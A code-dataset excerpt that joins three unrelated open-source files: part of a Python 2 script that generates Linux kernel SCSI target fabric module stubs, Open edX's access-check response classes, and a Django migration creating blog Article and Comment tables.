buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!(nacl)) {\n"
buf += " printk(KERN_ERR \"Unable to alocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('release_cmd_to_pool', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('new_cmd_failure\)\(', fo):
buf += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
if re.search('pack_lun\)\(', fo):
buf += "u64 " + fabric_mod_name + "_pack_lun(unsigned int lun)\n"
buf += "{\n"
buf += " WARN_ON(lun >= 256);\n"
buf += " /* Caller wants this byte-swapped */\n"
buf += " return cpu_to_le64((lun & 0xff) << 8);\n"
buf += "}\n\n"
bufi += "u64 " + fabric_mod_name + "_pack_lun(unsigned int);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
| gpl-2.0 |
jamiefolsom/edx-platform | lms/djangoapps/courseware/access_response.py | 87 | 4737 | """
This file contains all the classes used by has_access for error handling
"""
from django.utils.translation import ugettext as _
from xmodule.course_metadata_utils import DEFAULT_START_DATE
class AccessResponse(object):
"""Class that represents a response from a has_access permission check."""
def __init__(self, has_access, error_code=None, developer_message=None, user_message=None):
"""
Creates an AccessResponse object.
Arguments:
has_access (bool): if the user is granted access or not
error_code (String): optional - default is None. Unique identifier
for the specific type of error
developer_message (String): optional - default is None. Message
to show the developer
user_message (String): optional - default is None. Message to
show the user
"""
self.has_access = has_access
self.error_code = error_code
self.developer_message = developer_message
self.user_message = user_message
if has_access:
assert error_code is None
def __nonzero__(self):
"""
Overrides bool().
Allows for truth value testing of AccessResponse objects, so callers
who do not need the specific error information can check if access
is granted.
Returns:
bool: whether or not access is granted
"""
return self.has_access
def to_json(self):
"""
Creates a serializable JSON representation of an AccessResponse object.
Returns:
dict: JSON representation
"""
return {
"has_access": self.has_access,
"error_code": self.error_code,
"developer_message": self.developer_message,
"user_message": self.user_message
}
class AccessError(AccessResponse):
"""
Class that holds information about the error in the case of an access
denial in has_access. Contains the error code, user and developer
messages. Subclasses represent specific errors.
"""
def __init__(self, error_code, developer_message, user_message):
"""
Creates an AccessError object.
An AccessError object represents an AccessResponse where access is
denied (has_access is False).
Arguments:
error_code (String): unique identifier for the specific type of
error developer_message (String): message to show the developer
user_message (String): message to show the user
"""
super(AccessError, self).__init__(False, error_code, developer_message, user_message)
class StartDateError(AccessError):
"""
Access denied because the course has not started yet and the user
is not staff
"""
def __init__(self, start_date):
error_code = "course_not_started"
if start_date == DEFAULT_START_DATE:
developer_message = "Course has not started"
user_message = _("Course has not started")
else:
developer_message = "Course does not start until {}".format(start_date)
user_message = _("Course does not start until {}" # pylint: disable=translation-of-non-string
.format("{:%B %d, %Y}".format(start_date)))
super(StartDateError, self).__init__(error_code, developer_message, user_message)
class MilestoneError(AccessError):
"""
Access denied because the user has unfulfilled milestones
"""
def __init__(self):
error_code = "unfulfilled_milestones"
developer_message = "User has unfulfilled milestones"
user_message = _("You have unfulfilled milestones")
super(MilestoneError, self).__init__(error_code, developer_message, user_message)
class VisibilityError(AccessError):
"""
Access denied because the user does have the correct role to view this
course.
"""
def __init__(self):
error_code = "not_visible_to_user"
developer_message = "Course is not visible to this user"
user_message = _("You do not have access to this course")
super(VisibilityError, self).__init__(error_code, developer_message, user_message)
class MobileAvailabilityError(AccessError):
"""
Access denied because the course is not available on mobile for the user
"""
def __init__(self):
error_code = "mobile_unavailable"
developer_message = "Course is not available on mobile for this user"
user_message = _("You do not have access to this course on a mobile device")
super(MobileAvailabilityError, self).__init__(error_code, developer_message, user_message)
| agpl-3.0 |
kozmo12345/zm | zmBlog/migrations/0001_initial.py | 1 | 1904 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-04 08:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('article_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
('category', models.IntegerField(default=0)),
('article_title', models.CharField(max_length=300)),
('article_text', models.TextField()),
('cre_date', models.DateTimeField(verbose_name='date published')),
('mod_date', models.DateTimeField(verbose_name='date published')),
('cre_user', models.CharField(max_length=300)),
('mod_user', models.CharField(max_length=300, null=True)),
('pub_date', models.DateTimeField(null=True)),
('status', models.IntegerField(default=0)),
('like', models.IntegerField(default=0)),
('dislike', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('comment_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
('article_id', models.IntegerField()),
('comment_text', models.CharField(max_length=300)),
('cre_date', models.DateTimeField(verbose_name='date published')),
('mod_date', models.DateTimeField(verbose_name='date published')),
('cre_user', models.CharField(max_length=300)),
('mod_user', models.CharField(max_length=300, null=True)),
('status', models.IntegerField(default=0)),
],
),
]
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.